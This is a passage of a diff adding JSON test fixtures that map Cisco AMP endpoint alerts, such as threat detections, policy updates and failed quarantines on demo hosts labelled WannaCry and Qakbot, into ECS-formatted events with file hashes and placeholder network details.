+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.24D004A104-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558977",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:32.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:31:29.843662300Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6412662859016176000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:31.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:31:29.843664186Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6412662854721208000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:30.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843666081Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6412662850426241000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412662850426241035",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:30.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843667970Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6412662850426241000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412662850426241034",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:30.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843669890Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6412662850426241000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412662850426241033",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:30.000Z",
+            "file": {
+                "name": "el2j9fcqj.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe",
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843671791Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6412662850426241000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D177E09A9A-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412662850426241035",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:30.000Z",
+            "file": {
+                "name": "kepv86368.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe",
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843673656Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6412662850426241000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D177E09A9A-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412662850426241034",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:10:30.000Z",
+            "file": {
+                "name": "uqlq0o884.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe",
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843675538Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6412662850426241000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D177E09A9A-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412662850426241033",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T18:03:55.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843677434Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419281601187807000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
